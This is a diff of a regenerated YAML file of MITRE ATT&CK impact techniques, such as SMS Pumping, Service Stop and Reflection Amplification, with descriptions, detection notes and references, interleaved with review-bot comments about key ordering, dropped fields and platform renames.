x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
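Review bot: `- T1499.003:` at the top of this hunk is not a deletion; the technique re-enters at the bottom (`+ T1499.003:` just above `name: Application Exhaustion Flood`) after the newly inserted T1485.001 and T1496.003, and the hunk only reads as a removal because the generator now orders keys differently (`modified`/`name`/`description` first, `type`/`id`/`created` after the `x_mitre_*` fields). A stable key order in the generator would keep these regenerations reviewable. Both new techniques arrive with `x_mitre_detection: ''` and `atomic_tests: []`, so this change adds catalogue entries only, with no detection guidance or test coverage yet for Lifecycle-Triggered Deletion or SMS Pumping.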
@@ -58401,13 +59158,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -58415,12 +59179,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -58481,109 +59266,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
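Review bot: the rewritten Service Stop description keeps the stray line break after `MSExchangeIS` (the continuation line starting `, which will make Exchange content inaccessible.`); inside this double-quoted YAML scalar that break folds to a space, so the rendered text reads `MSExchangeIS , which`. It appears to be inline code markup being stripped while its surrounding newline is kept, so the fix belongs in the generator rather than in hand edits to this file; the `ChangeServiceConfigW` line in the detection text of the next hunk shows the same symptom. The rest of this hunk is field reordering for T1565.001 and T1489 with no value changes beyond `modified` and the FireEye APT38 URL moving from content.fireeye.com to www.mandiant.com.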
@@ -58592,10 +59347,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -58606,39 +59365,37 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests: []
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
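Review bot: `identifier: T1489` survives as a context line between `x_mitre_modified_by_ref` and `atomic_tests: []` and is the only technique in this diff carrying that key; if it is a leftover from an older generator version it should go in the same regeneration, otherwise a short note on why T1489 is special would help. The block under `T1499.004:` that looks deleted here is, as with the other techniques, re-emitted in the following hunks in the new key order, so only the platform narrowing and version bump there are real changes.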
@@ -58656,13 +59413,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -58670,36 +59434,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -58708,11 +59463,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -58721,17 +59482,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
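Review bot: this hunk drops two fields from T1565.003 with nothing added in their place, `x_mitre_permissions_required` (User/Administrator/root/SYSTEM) and `spec_version: '2.1'`; the `spec_version` removal recurs in nearly every entry below, so any index generator or report that reads either key needs a matching change in this PR. Separately, the `FireEye APT38 Oct 2018` url moves from content.fireeye.com to a mandiant.com PDF while the `Retrieved November 6, 2018` date is left as is, unlike the FS-ISAC reference further down where the retrieval date was refreshed together with the url; that is upstream ATT&CK data, but the retrieval date no longer matches the url.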
@@ -58740,6 +59515,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -58755,17 +59531,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
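Review bot: `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` are removed from the T1498.002 platform list with no replacement, whereas in the T1657 and T1531 hunks below `Office 365` is replaced by `Office Suite`; any per-platform index built from this file will lose this technique under the old platform names and needs to recognise the new `Office Suite` name, so please confirm the platform-to-index mapping was updated alongside this regeneration.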
@@ -58775,14 +59546,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
@@ -58791,28 +59563,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
